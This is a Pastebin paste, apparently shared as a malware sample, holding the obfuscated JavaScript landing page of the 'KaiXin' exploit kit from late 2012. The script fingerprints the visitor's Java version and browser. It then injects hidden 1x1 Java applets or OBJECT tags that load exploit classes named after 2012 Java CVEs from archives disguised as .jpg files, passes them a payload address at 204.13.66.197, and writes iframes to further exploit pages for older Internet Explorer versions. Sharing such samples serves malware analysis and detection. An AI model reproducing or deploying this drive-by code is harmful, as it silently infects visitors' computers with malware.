eromang

KaiXin Exploit Kit EK November 2012

Dec 5th, 2012
689
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var RWkTTC8=navigator.userAgent.toLowerCase();
  2. if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1)
  3. {
  4. var expires=new Date();
  5. expires.setTime(expires.getTime()+24*60*60*1000);
  6. document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
  7. var kaixiny=document.createElement('body');
  8. document.body.appendChild(kaixiny);
  9. var kaixinm=deployJava.getJREs()+"";
  10. kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
  11. if (kaixinm<=17007)
  12. {
  13.     var kaixin=document.createElement('applet');
  14.     kaixin.width="1";
  15.     kaixin.height="1";
  16.     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
  17.     {
  18.         kaixin.archive="xdwmA2Xd.jpg";     
  19.         kaixin.code="GondadGondadExp.class";
  20.         kaixin.setAttribute("dota","http://204.13.66.197/ins/rar.css");
  21.         document.body.appendChild(kaixin);
  22.     }
  23.     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))
  24.     {
  25.         kaixin.archive="lXjOhqg.jpg";      
  26.         kaixin.code="gond1723.Gondattack.class";   
  27.         kaixin.setAttribute("xiaomaolv","http://204.13.66.197/ins/rar.css");   
  28.         kaixin.setAttribute("bn","woyouyizhixiaomaolv");
  29.         kaixin.setAttribute("si","conglaiyebuqi");
  30.         kaixin.setAttribute("bs","748");   
  31.         document.body.appendChild(kaixin);
  32.     }
  33.     else if (kaixinm<=17006 && kaixinm>=17003)
  34.     {
  35.         var ques3 = window.navigator.userAgent.toLowerCase();
  36.         if (ques3.indexOf("msie 6") > -1)
  37.         {
  38.             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://204.13.66.197/ins/rar.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'obDb9.jpg'></OBJECT>");
  39.         }
  40.         else
  41.         {
  42.             document.write("<br>");
  43.             var kaixinq = document.createElement("body");
  44.             document.body.appendChild(kaixinq);
  45.             var kaixiny = document.createElement("applet");
  46.             kaixiny.width = "256";
  47.             kaixiny.height = "256";
  48.             kaixiny.archive = "obDb9.jpg";
  49.             kaixiny.code = "cve2012xxxx.Gondvv.class";
  50.             kaixiny.setAttribute("xiaomaolv", "http://204.13.66.197/ins/rar.css");
  51.             kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
  52.             kaixiny.setAttribute("si", "conglaiyebuqi");
  53.             kaixiny.setAttribute("bs", "748");
  54.             document.body.appendChild(kaixiny);
  55.         }
  56.     }
  57.     else
  58.     {
  59.         var oxysy1 = window.navigator.userAgent.toLowerCase();
  60.         if (oxysy1.indexOf("msie 6") > -1)
  61.         {
  62.             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='1' height='1'><param name=xiaomaolv value= 'http://204.13.66.197/ins/rar.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gond20125076.Gondqq.class'><param name=archive value= 'MMWYD.jpg'></OBJECT>");
  63.         }
  64.         else
  65.         {
  66.             document.write("<br>");
  67.             var kaixinq = document.createElement("body");
  68.             document.body.appendChild(kaixinq);
  69.             var kaixiny = document.createElement("applet");
  70.             kaixiny.width = "1";
  71.             kaixiny.height = "1";
  72.             kaixiny.archive = "MMWYD.jpg";
  73.             kaixiny.code = "gond20125076.Gondqq.class";
  74.             kaixiny.setAttribute("xiaomaolv", "http://204.13.66.197/ins/rar.css");
  75.             kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
  76.             kaixiny.setAttribute("si", "conglaiyebuqi");
  77.             kaixiny.setAttribute("bs", "748");
  78.             document.body.appendChild(kaixiny);
  79.         }
  80.     }
  81. }
  82. else
  83. {
  84.  
  85.     var pcss=navigator.userAgent.toLowerCase();
  86.     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
  87.     if ((UaYcKzD2.indexOf('msie 8.0') > -1))
  88.     {
  89.         document.writeln("<iframe src=WysBRr.html><\/iframe>");
  90.     }
  91.     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
  92.     {
  93.         document.writeln("<iframe src=JSZlR.html><\/iframe>");
  94.  
  95.     }
  96. }
  97. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×